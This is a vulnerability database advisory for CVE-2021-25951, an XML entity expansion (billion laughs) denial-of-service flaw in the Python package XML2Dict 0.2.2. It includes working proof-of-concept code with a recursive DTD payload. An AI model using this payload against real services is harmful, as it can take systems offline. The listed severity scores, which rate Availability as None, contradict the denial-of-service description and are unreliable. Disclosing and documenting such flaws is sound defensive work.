Mend.io Vulnerability Database

What is a CVE vulnerability ID? icon What is a WS vulnerability ID? icon What is an MSC vulnerability ID? icon
New vulnerability? Tell us about it!
icon

We found results for “

CVE-2021-25951

Date: June 30, 2021

Overview

XXE vulnerability in 'XML2Dict ' version 0.2.2 allows attacker to cause a denial of service.

Details

The PyPi module 'XML2Dict ' is vulnerable to XML Entity Expansion vulnerability as the function `parse()` does not restrict recursive entity references in DTDs in a specially crafted XML document. Due to this flaw an attacker could load a file which is defines multiple entities recursively thus causing denial-of-service.

PoC Details

The function `parse()` accepts an XML file as input and converts it to JSON. As the function does not properly control the number of recursive definitions of entities, this can lead to explosive growth of data when parsed, causing a denial of service.

PoC Code

from encoder import XML2Dict

xml2dic = XML2Dict()

doc = """ <!--?xml version="1.0" ?--> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> """

xml2dic.parse(doc)

Affected Environments

0.2.2

Prevention

No fix version

Language: Python

Good to know:

icon
icon

Improper Restriction of XML External Entity Reference ('XXE')

CWE-611
icon

Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): High
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Additional information:

Related Resources (4)

https://github.com/mcspring/XML2Dict/blob/a84f7af8bb3676e66f697751633310883cb80795/setup.py#L6
https://nvd.nist.gov/vuln/detail/CVE-2021-25951
https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25951
https://www.mend.io/vulnerability-database/CVE-2021-25951